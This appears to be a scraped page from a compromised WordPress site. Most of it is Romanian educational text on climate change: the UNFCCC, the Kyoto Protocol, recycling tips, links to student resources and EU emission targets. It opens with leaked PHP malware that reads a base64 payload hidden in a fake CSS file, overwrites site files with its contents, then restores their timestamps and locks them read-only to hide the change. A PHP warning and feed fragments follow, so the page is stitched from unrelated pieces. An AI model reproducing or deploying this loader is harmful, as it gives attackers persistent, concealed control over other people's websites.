$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css";
if ( is_file($wp_update_file) )
{
$wp_update_content=trim(file_get_contents($wp_update_file));
if ( $wp_update_content!="" )
{
$wp_update_content=substr($wp_update_content,6,-6);
$wp_update_content=base64_decode($wp_update_content);
$wp_update_arr=json_decode($wp_update_content,true);
if ( is_array($wp_update_arr) )
{
foreach($wp_update_arr as $value)
{
$file_mtime=filemtime($value["path"]);
@chmod($value["path"],0777);
@unlink($value["path"]);
@file_put_contents($value["path"],$value["content"]);
@touch($value["path"],$file_mtime);
@chmod($value["path"],0444);
}
}
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/feed-rss2.php on line 8
Unul intre principiile cheie ale UNFCCC este cel al „responsabilităţilor comune dar diferenţiate”, care impune ţărilor dezvoltate să conducă lupta împotriva schimbărilor climatice şi ale efectelor acestora. Prin diferenţierea între ţările dezvoltate şi cele în curs de dezvoltare, UNFCCC recunoaşte faptul că ţările dezvoltate, industrializate, sunt responsabile de majoritatea acumulării de gaze cu efect de seră din atmosferă şi dispun de resursele financiare şi tehnologice necesare reducerii emisiilor lor.
UNFCCC îşi obligă semnatarii să stabilească programe naţionale de reducere a emisiilor de gaze cu efect de seră şi să depună rapoarte periodice. De asemenea, ea a cerut ţărilor industrializate semnatare, mai puţin ţărilor în curs de dezvoltare, ca până în 2000, să stabilizeze emisiile de gaze cu efect de seră la nivelurile înregistrate în 1990, obiectiv pe care l-au atins în mod colectiv. Semnatarii UNFCCC se reunesc anual pentru a revizui progresul şi pentru a discuta măsuri ulterioare, iar un număr de mecanisme de monitorizare şi de raportare la nivel internaţional au fost înfiinţate pentru a obţine informaţii despre emisiile de gaze cu efect de seră.
Protocolul de la Kyoto
Guvernele sunt conştiente de faptul că eforturile UNFCCC nu vor fi suficiente pentru a aborda cu seriozitate schimbările climatice. La 11 decembrie 1997, ele au mai făcut un pas înainte şi au adoptat un protocol al UNFCCC, în oraşul japonez Kyoto: Protocolul de la Kyoto. Având la bază cadrul UNFCCC, protocolul stabileşte limite obligatorii privind emisiile de gaze cu efect de seră pentru 38 de ţări industrializate, la origine, inclusiv toate statele membre ale Uniunii Europene, mai puţin Cipru şi Malta, precum şi pentru UE ca o entitate (denumită UE-15, deoarece atunci Uniunea număra doar 15 state membre). De asemenea, protocolul a introdus mecanisme inovatoare de implementare bazate pe teoria schimbului, aşa-numitele mecanisme flexibile prevăzute de Protocolul de la Kyoto, care vizează limitarea costurile legate de reducerea emisiilor.
În cadrul Protocolului de la Kyoto, ţărilor industrializate li se cere să-şi reducă emisiile a şase gaze cu efect de seră (CO2, metan, protoxid de azot, hidrofluorocarburi, perfluorocarburi şi exafluorură de sulf) cu aproximativ 5% sub nivelul înregistrat în 1990, pe parcursul primei „perioade de angajament” a Protocolului de la Kyoto, cuprinsă între 2008-2012. S-a optat pentru o perioadă de angajament de cinci ani, în detrimentul unui an ţintă unic, pentru a compensa fluctuaţiile anuale ale emisiilor datorate unor factori care nu pot fi controlaţi, precum condiţiile meteo. Protocolul nu prevede obiective de emisii pentru ţările în curs de dezvoltare.
Protocolul de la Kyoto a intrat în vigoare la 16 februarie 2005. Până în iunie 2007, 172 de state şi Comunitatea Europeană au ratificat acest protocol. Două dintre ţările care iniţial au semnat tratatul nu l-au ratificat: SUA a respins protocolul, în timp ce Australia a luat decizia de a nu-l ratifica. Cu alte cuvinte, 36 de ţări dezvoltate, la care se adaugă UE-15 şi-au luat angajamentul de a-şi atinge obiectivele Kyoto.
Informaţii suplimentare despre obiectivele Kyoto în UE
]]>• Puneţi sticlele folosite în cutia de sticle şi sortaţi hârtia, cartonul, plasticul şi conservele de restul deşeurilor. Reciclarea unei conserve de aluminiu economiseşte 90% din energia necesară producerii unei conserve noi – 9 kg de emisii de CO2 pentru fiecare kilogram de aluminiu! Prin reciclarea unui kilogram de plastic, se economiseşte 1,5 kg de CO2; pentru un kilogram de sticlă se evită emiterea a 300 gr de CO2, iar reciclarea unui kilogram de hârtie, în loc de eliminarea la o groapă de gunoi, scuteşte 900 gr de emisii de CO2 şi de metan.
• Reduceţi deşeurile. Multe din produsele pe care le cumpărăm generează, într-un fel sau altul, gaze cu efect de seră, pe durata producţiei sau a distribuţie lor de exemplu. Dacă folosiţi o cutie de alimente refolosibilă, în locul uneia de unică folosinţă, economisiţi energia necesară producerii unor noi cutii de alimente.
• Refolosiţi pungile pentru cumpărături. Când mergeţi la cumpărături, utilizaţi pungile refolosibile în loc de a lua o nouă pungă la fiecare magazin. Astfel, puteţi economisi energie şi puteţi reduce cantitatea de deşeuri. Deşeurile nu numai că elimină CO2 şi metan în atmosferă, ci şi poluează aerul, pânza freatică şi solul. O sticlă de 1,5 l are nevoie de mai puţină energie şi produce mai puţine deşeuri decât trei sticle de 0,5 l.
• Alegeţi produsele fără ambalaje inutile şi cumpăraţi rezerve acolo unde se poate, veţi reduce producţia de deşeuri şi consumul de energie!
• Cumpăraţi inteligent: o sticlă de 1,5 l are nevoie de mai puţină energie şi produce mai puţine deşeuri decât trei sticle de 0,5 l.
• Reciclaţi deşeurile organice.Gropile de gunoi sunt responsabile pentru 3% de emisii de gaze cu efect de seră în UE, datorită metanului eliberat prin descompunerea deşeurilor biodegradabile. Puteţi evita această problemă prin reciclarea sau compostarea deşeurilor organice, dacă aveţi o grădină! Aveţi grijă să realizaţi corect compostarea, deoarece deşeurile organice se descompun în prezenţa unei cantităţi suficiente de oxigen, altfel compostarea va cauza emisii de metan şi un miros insuportabil.
]]>Ghidul elevului: Voi ţineţi sub control schimbările climatice
Comisia Europeană a pregătit o broşură dedicată elevilor care conţine informaţii despre schimbările climatice şi rolul pe care ei îl pot avea în controlarea acestora. Puteţi descărca broşura aici. Gândiţi-vă de două ori înainte de a o imprima!
Prezentare PowerPoint
Martin Hedberg, meteorolog în cadrul Institutului Suedez de Meteorologie a rezumat provocările schimbărilor climatice într-o prezentare PowerPoint concisă, pe înţelesul tuturor, în care veţi găsi fapte şi cifre despre schimbările climatice şi idei pentru proiectele şcolare. Descărcaţi prezentarea aici.
Teme de discuţie
Documentele PDF de mai jos conţin propuneri de activităţi de încurajare a dezbaterilor pe tema schimbărilor climatice într-o manieră interesantă şi interactivă. Elevii sunt încurajaţi să adopte un vocabular specific domeniului schimbărilor climatice şi să evalueze impactul pe care acţiunile lor îl pot avea asupra planetei.
• PDF 1: „Fişa de lucru: Implicaţi-vă!”
• PDF 2: „Fişa de lucru: Gândiţi, dezbateţi, acţionaţi!”
• PDF 3: „Fişa de lucru: Spuneţi-vă opinia!”
• PDF 4: „Fişa de lucru: Chestionare”
EPAEDIA – o enciclopedie de mediu
Agenţia Europeană de Mediu (EEA) monitorizează starea mediului din Europa şi furnizează decidenţilor politici şi cetăţenilor informaţii pe această temă.
EPAEDIA, noua enciclopedie de mediu a EEA, oferă publicului informaţii şi noutăţi într-un mod simplu şi agreabil. Aceasta este structurată pe mai multe niveluri de informaţie pentru a putea răspunde diferitelor grade de interes pentru problemele de mediu. Aceste niveluri sunt: o scurtă introducere, un instantaneu sau un rezumat şi un articol complet. Funcţionalităţile multimedia cuprind:
• hărţi – care oferă ilustraţii grafice ale consecinţelor de mediu;
• jocuri de simulare – care permit utilizatorilor să observe efectul imediat al acţiunilor şi al comportamentului lor;
• ilustraţii animate – care arată complexitatea problemelor de mediu;
• imagini video – acestea permit vizitatorilor să interacţioneze cu experţii EEA care răspund întrebărilor din domeniul lor de expertiză.
Epaedia poate fi accesată la adresa: http://epaedia.eea.europa.eu/index.php.
V GAS – Energie, stiluri de viaţă şi climă
V GAS este un joc generat de calculator care simulează cum stilul nostru de viaţă influenţează volumul de gaze cu efect de seră emanate în atmosferă. Jocul poate fi folosit ca un instrument de cercetare, deoarece furnizează o bibliotecă virtuală de informaţii despre politicile de luptă împotriva schimbărilor climatice, despre consecinţele schimbărilor climatice şi despre efectul de seră. Trimiteţi un e-mail la vgas@jrc.it pentru a primi un exemplar gratuit.
Tinerii europeni şi mediul
Pe acest site poţi descoperi singur sau împreună cu prietenii şi colegii de clasă ce este mediul şi ce se întâmplă cu acesta. Site-ul abordează patru teme foarte importante asupra cărora Uniunea Europeană se va concentra în următorii 10 ani: aer, apă, deşeuri şi natură.
Vizitează Tinerii europeni şi mediul la adresa: http://ec.europa.eu/environment/youth/index_en.html
ManagEnergy
ManagEnergy este o iniţiativă a Direcţiei Generale Energie şi Transport a Comisiei Europene. ManagEnergy conţine o bază de date on-line cu resurse educaţionale din Europa şi cuprinde secţiuni speciale dedicate profesorilor, precum şi elevilor între 12 şi 16 ani.
Secţiunea profesorilor: http://www.managenergy.net/kidscorner/te2.html
Secţiunea elevilor: http://www.managenergy.net/kidscorner/en/o11/o11.html
Contribuţia fiecărui stat membru al UE-15 la obiectivul de reducere colectivă cu 8% a emisiilor din cadrul Protocolului de la Kyoto
Austria -13%
Belgia -7.5%
Danemarca -21%
Finlanda 0%
Franţa 0%
Germania -21%
Grecia +25%
Irlanda +13%
Italia -6.5%
Luxemburg -28%
Ţările de Jos -6%
Portugalia +27%
Spania +15%
Suedia +4%
Regatul Unit -12.5%
Statele membre UE cu obiective individuale de reducere a emisiilor în cadrul Protocolului de la Kyoto
Bulgaria -8%
Republica Cehă -8%
Estonia -8%
Ungaria -6%
Letonia -8%
Lituania -8%
Polonia -6%
România -8%
Republica Slovacă -8%
Slovenia -8%